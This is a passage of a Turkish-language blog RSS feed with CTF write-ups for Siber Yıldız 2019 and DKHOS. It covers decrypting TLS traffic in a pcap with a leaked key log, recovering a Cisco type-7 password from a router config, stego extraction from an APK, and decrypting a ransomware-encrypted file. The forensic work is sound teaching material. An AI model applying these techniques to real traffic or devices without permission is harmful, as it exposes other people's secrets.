&lt;h3 id=&quot;herşey-sanal-ağ-gerçek&quot;&gt;Herşey Sanal Ağ Gerçek&lt;/h3&gt;

&lt;p&gt;&lt;a href=&quot;/assets/files/siber-yildiz-2019-cozumleri/network01.zip&quot; target=&quot;blank&quot;&gt;network01.zip&lt;/a&gt; dosyasını indirdiğimizde içinde network-150.pcap dosyası çıkıyor. Wireshark aracı ile incelemeye başladığımızda 851. frame’de sslkeylog.log isminde bir dosyanın indirildiğini görüyoruz.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/hersey-sanal-ag-gercek-wireshark.png&quot; alt=&quot;Wireshark sslkeylog&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Wireshark’da pcap üzerindeki dosyaları indirmek için File&amp;gt;Export Objects&amp;gt;HTTP menüsüne tıklarsak HTTP üzerinden geçen dosyaları görebilir ve save butonu ile kayıt edebilirsiniz. Burada benim için önemli olan sslkeylog.log dosyasını bilgisayarıma kayıt ediyorum. Peki ne işe yarar bu dosya? Pre-master secret log dosyasına sahip isek sunucu anahtarına sahip olmasak bile  ssl üzerinden geçen trafiğin şifresini çözebiliriz.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# SSL/TLS secrets log file, generated by NSS
CLIENT_RANDOM 3c059964842e18ec3b9c53849f09efd9d1108d642b7924193e55f08555858758 27f60b710d7835657c6d5fe36b6bc1f340a71df91226542bbf296c15a939be9e617e7a94662bfdbc190bf9b69f44f4ad
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Artık bu dosyaya sahip olduğumuza göre bunu Wireshark’a ekleyebiliriz. Edit&amp;gt;Preferences’e tıklayıp sol menüden Protocols&amp;gt;SSL ‘i seçiyoruz. (Pre)-Master-Secret log filename kısmından indirdiğimiz dosyayı seçip kaydediyoruz. Artık SSL üzerinden geçen trafiği de okuyabiliriz.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/wireshark-import.png&quot; alt=&quot;Wireshark ssl key import&quot; /&gt;&lt;/p&gt;

&lt;p&gt;798 Frame’de 99037582138585721057129547823.pkt isminde bir dosyaya istekte bulunulmuş. İsteği daha ayrıntılı görmek için üzerine sağ tıklayıp Follow&amp;gt;Http Stream derseniz giden Get isteğini görebilirsiniz. Sonuç 200 yani olumlu dönmüş ama herhangi bir dosya gelmemiş. Bende bu soruyu indirdiğim sunucudan aynı dosyayı indirmeye çalıştığımda dosya indi.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;http://85.111.95.19/53ebbeb47594621b58376210b90269ad-network01/99037582138585721057129547823.pkt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Ufak bir araştırma ile inen dosyanın Cisco’nun kendi cihazları için geliştirdiği bir network simulator olan Cisco Packet Tracer tarafından kullanıldığını görüyoruz. Hemen ilgili programı indirip dosyayı açtım.
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/packettracer.png&quot; alt=&quot;Packet tracer&quot; /&gt;&lt;br /&gt;
Ortada bulunan router’a çift tıklayıp Config menüsüne geldiğimizde dışarıya aktarabileğimiz config dosyaları çıkıyor. Startup Config dosyasını dışarı aktarıyorum. Dışarı aktardığı config dosyasının 22. Satırında kullanıcı adı ve kullanıcının parolası tutuluyor.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;username usom password 7 0200085A0C5C022519061B49100317193C2439386D
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;a href=&quot;http://www.ifm.net.nz/cookbooks/passwordcracker.html&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;Linkteki&lt;/a&gt; aracı kullanıyoruz.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/ag-gercek-flag.png&quot; alt=&quot;Flag&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;oburixin-şifresi&quot;&gt;Oburix’in Şifresi&lt;/h3&gt;

&lt;p&gt;Sorudaki &lt;a href=&quot;/assets/files/siber-yildiz-2019-cozumleri/network02.zip&quot; target=&quot;blank&quot;&gt;dosyayı&lt;/a&gt; indirip wireshark ile açıyoruz. 156. frame’de usom.png isminde bir resim geçtiği gözüküyor. İlgili frame’e OBEX Protocol&amp;gt;Portable Network Graphics’e sağ tıklıyoruz ve Show Packet Bytes’ a basıyoruz.&lt;br /&gt;
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/obex-wireshark.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ve flag karşımızda.
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/network2-flag.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;reklam-arası-bitti-film-başlıyor&quot;&gt;Reklam arası bitti film başlıyor&lt;/h3&gt;

&lt;p&gt;&lt;a href=&quot;/assets/files/siber-yildiz-2019-cozumleri/dump.scm&quot; target=&quot;blank&quot;&gt;dump.scm&lt;/a&gt; dosyasının uzantısı olan scm hakkında araştırma yaptığımızda Samsung televizyonların kanal listesini tutan bir backup dosyası olduğunu görüyoruz. Dosyanın içeriğini görüntülemek için http://samschanneledit.sourceforge.net/ programını indirebilirsiniz.
Map-SateD menüsünde kanallar arasında USOM TV ve bir link var.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/samchanneledit.png&quot; alt=&quot;Sam Channel Edit&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hızlıca linke giriyoruz ve Interstellar filmini karşımızda buluyoruz. Kısa bir süreliğine soru çözmeye ara verip keyifle filmin sahnesini izlerken arkadan kötü bir cızırtı sesi geliyor. Hemen videoyu indirip mp3’e çevirdim ve Sonic Visualiser programı ile incelemeye başladım.&lt;br /&gt;
Layer&amp;gt;Add Spectrogram&amp;gt;All Channels seçeneğine tıkladım. Cızırtının geldiği saniyeye geldiğimde flag karşıma çıktı.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/sonic-visualiser.png&quot; alt=&quot;Sonic visualiser&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;bir-bakan-var-bir-de-aranan&quot;&gt;Bir bakan var, bir de aranan&lt;/h3&gt;

&lt;p&gt;Soruya girdiğimizde alttaki hash karşıma çıktı.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;0827206450376af3dce61d788ddeba21f58dba35257fdb43c1872c096a36287f
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Virustotal üzerinden hashi arattığımda alttaki yorumda bize bir mobil uygulama linki verilmiş.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;https://www.virustotal.com/tr/file/0827206450376af3dce61d788ddeba21f58dba35257fdb43c1872c096a36287f/analysis/  
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/virustotal.png&quot; alt=&quot;Virustotal&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Apktool aracını kullanarak apk içindekileri çıkartıyorum. Res/drawable içinde 11 adet resim vardı.&lt;br /&gt;
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/apktool-puzzles.png&quot; alt=&quot;apktool&quot; /&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;binwalk *.jpg --dd &apos;.*&apos;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;komutu ile tüm resimlerin içinde başka bir şey var mı diye bakıyorum. Birçok resimde birbirinin aynısı olan bir zip eklenmişti. Fakat ortakoy.jpg içerisinde diğerlerinden farklı şifrelenmiş bir zip dosyası vardı.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/sifreli-zip.png&quot; alt=&quot;image&quot; /&gt;&lt;br /&gt;
Ve dikkat çeken başka bir resim vardı.
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/sairdemiski.png&quot; alt=&quot;sairdemiski&quot; /&gt;&lt;br /&gt;
Bu resme exiftool ile baktığımızda&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Rights: =?ufh]5%T7R2mGvQU?&amp;lt;n
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Bunu az önce bulduğumuz şifrelenmiş zip’e denediğimizde açılıyor ve içinde uzun bir base64 kodu çıkıyor.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;cat hadibul.b64 | base64 --decode &amp;gt; hadibul
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Komutunu kullanarak dosyanın içindeki base64’ü binary formatta hadibul isminde bir dosyaya yazıyoruz. Dosyaya “file hadibul” şeklinde bakıldığında zip olarak gösteriyor. İçeriğini kontrol ettiğimizde bunun bir APK olduğunu anlıyoruz. Apk’yı bir emülatöre kurup çalıştırdım.&lt;br /&gt;
&lt;img src=&quot;/assets/images/post/siber-yildiz-2019-cozumleri/mobile-flag.jpg&quot; alt=&quot;Mobile sorusu flag&quot; /&gt;&lt;br /&gt;
Flag çıkan yazının md5 hashlenmiş haliydi.&lt;/p&gt;
</description>
        <pubDate>Sun, 03 Feb 2019 00:00:00 +0000</pubDate>
        <link>/siber-yildiz-2019-cozumleri/</link>
        <guid isPermaLink="true">/siber-yildiz-2019-cozumleri/</guid>
        
        <category>Siber Yıldız</category>
        
        <category>btk</category>
        
        <category>CTF</category>
        
        <category>Writeup</category>
        
        
      </item>
    
      <item>
        <title>DKHOS CTF WRITE-UP</title>
        <description>&lt;p&gt;Merhaba bu yazıda Snorlax ismi ile katıldığımız ve 15. olarak tamamladığımız DKHOS CTF’deki bazı soruların çözümlerini paylaşacağım.&lt;/p&gt;

&lt;h3 id=&quot;forensic-500-son-parça&quot;&gt;Forensic 500 (Son Parça)&lt;/h3&gt;

&lt;p&gt;Soruda “for500.img” ve “bb3490207fffb173610c724fed93c0eb3368804d” isimli dosyalar verilmişti. for500’ü R-Studio isimli veri kurtarma programı ile açınca home isimli kullanıcının masaüstünde “1.R4A” adlı dosya olduğunu gördüm. R4A uzantısını biraz araştırınca “7even-HONE$T” isimli ransomware’a ait olduğunu öğrendim. Github’da bulduğum decoder ile decrypt edince içinden flag.zip çıktı.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/dkhos-cozumleri/for500.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Flag.zip dosyasını açmaya çalışınca hata verdi. Sorudaki diğer dosya üzerinde aynı işlemi denedim ve sonuç.&lt;br /&gt;
&lt;img src=&quot;/assets/images/post/dkhos-cozumleri/for500-2.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/dkhos-cozumleri/for500-3.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;karanlıkta-arayış-başlar&quot;&gt;Karanlıkta arayış başlar&lt;/h3&gt;

&lt;p&gt;Soruda 6 saat uzunluğunda bir video vardı. strings aracı ile bakınca işaretli saniyede flag.jpg olduğunu gördüm.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/dkhos-cozumleri/karanlikstring.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;p&gt;3984383208960000f254016000000d&lt;/p&gt;

&lt;p&gt;f den önceki kısım frame sonraki d’ ye kadar olan kısım ise saniyedeki frame.  3984383208960000/254016000000=15685,56&lt;/p&gt;

&lt;p&gt;Sony Vegas yazılımı ile o saniyeye gidince flag karşıma çıktı.&lt;br /&gt;
&lt;img src=&quot;/assets/images/post/dkhos-cozumleri/karanlikflag.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;tamirci-pala-remzi&quot;&gt;Tamirci Pala Remzi&lt;/h3&gt;

&lt;p&gt;Videodan “Manchester Code” ile şifrelendiğini anladık.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/dkhos-cozumleri/palaremzi.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;p&gt;https://www.dcode.fr/manchester-code adresinden decode ettiğimizde binary olarak verdi. Binary’yi ASCII’ye çevirince “&lt;em&gt;_?NiSiM_riZaH_royilSaB_&lt;/em&gt;” çıktı. Tersine çevirince flag ortaya çıktı.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/post/dkhos-cozumleri/binarytoascii.jpg&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tüm soru çözümleri Prodaft tarafından &lt;a href=&quot;https://www.invictuseurope.com/blog/?search=DKHOS&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;yayınlandı&lt;/a&gt;.&lt;/p&gt;
</description>
        <pubDate>Wed, 14 Feb 2018 00:00:00 +0000</pubDate>
        <link>/dkhos-cozumleri/</link>
        <guid isPermaLink="true">/dkhos-cozumleri/</guid>
        
        <category>DKHOS</category>
        
        <category>CTF</category>
        
        <category>Writeup</category>
        
        
      </item>
    
  </channel>
</rss>
